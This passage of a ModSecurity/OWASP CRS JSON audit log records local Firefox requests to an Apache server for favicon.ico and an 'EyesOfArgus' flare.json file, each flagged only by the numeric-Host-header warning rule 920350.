80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcASX8AAQEAAAkYuEEAAAAD\"]"],"stopwatch":{"p1":539,"p2":1209,"p3":65,"p4":390,"p5":93,"sr":20,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:47:05 --0400","transaction_id":"WRcASX8AAQEAAAkYuEIAAAAD","remote_address":"127.0.0.1","remote_port":41700,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcASX8AAQEAAAkYuEIAAAAD\"]"],"stopwatch":{"p1":416,"p2":979,"p3":45,"p4":269,"p5":48,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:50:15 --0400","transaction_id":"WRcBB38AAQEAAAkZ0AgAAAAE","remote_address":"127.0.0.1","remote_port":41708,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 12:47:03 GMT","If-None-Match":"\"107-54f6738077c82\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 12:50:12 GMT","ETag":"\"107-54f674343ea58\"","Accept-Ranges":"bytes","Content-Length":"263","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcBB38AAQEAAAkZ0AgAAAAE\"]"],"stopwatch":{"p1":916,"p2":1838,"p3":115,"p4":232,"p5":78,"sr":47,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:50:15 --0400","transaction_id":"WRcBB38AAQEAAAkZ0AkAAAAE","remote_address":"127.0.0.1","remote_port":41708,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcBB38AAQEAAAkZ0AkAAAAE\"]"],"stopwatch":{"p1":455,"p2":893,"p3":45,"p4":372,"p5":51,"sr":20,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:50:15 --0400","transaction_id":"WRcBB38AAQEAAAkZ0AoAAAAE","remote_address":"127.0.0.1","remote_port":41708,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcBB38AAQEAAAkZ0AoAAAAE\"]"],"stopwatch":{"p1":491,"p2":964,"p3":63,"p4":526,"p5":126,"sr":22,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:11:58 --0400","transaction_id":"WRcGHn8AAQEAAAkVV4AAAAAA","remote_address":"127.0.0.1","remote_port":41714,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 12:50:12 GMT","If-None-Match":"\"107-54f674343ea58\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:11:55 GMT","ETag":"\"53a-54f6790ec94c7\"","Accept-Ranges":"bytes","Content-Length":"1338","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcGHn8AAQEAAAkVV4AAAAAA\"]"],"stopwatch":{"p1":783,"p2":1629,"p3":61,"p4":258,"p5":53,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:11:59 --0400","transaction_id":"WRcGH38AAQEAAAkVV4EAAAAA","remote_address":"127.0.0.1","remote_port":41714,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcGH38AAQEAAAkVV4EAAAAA\"]"],"stopwatch":{"p1":722,"p2":1021,"p3":76,"p4":376,"p5":48,"sr":28,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:11:59 --0400","transaction_id":"WRcGH38AAQEAAAkVV4IAAAAA","remote_address":"127.0.0.1","remote_port":41714,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcGH38AAQEAAAkVV4IAAAAA\"]"],"stopwatch":{"p1":642,"p2":1666,"p3":90,"p4":450,"p5":183,"sr":29,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:18:37 --0400","transaction_id":"WRcHrX8AAQEAAAmHBIkAAAAF","remote_address":"127.0.0.1","remote_port":41732,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 13:11:55 GMT","If-None-Match":"\"53a-54f6790ec94c7\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:18:34 GMT","ETag":"\"65-54f67a8b8202b\"","Accept-Ranges":"bytes","Content-Length":"101","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcHrX8AAQEAAAmHBIkAAAAF\"]"],"stopwatch":{"p1":900,"p2":1595,"p3":64,"p4":228,"p5":55,"sr":36,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:18:37 --0400","transaction_id":"WRcHrX8AAQEAAAmHBIoAAAAF","remote_address":"127.0.0.1","remote_port":41732,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
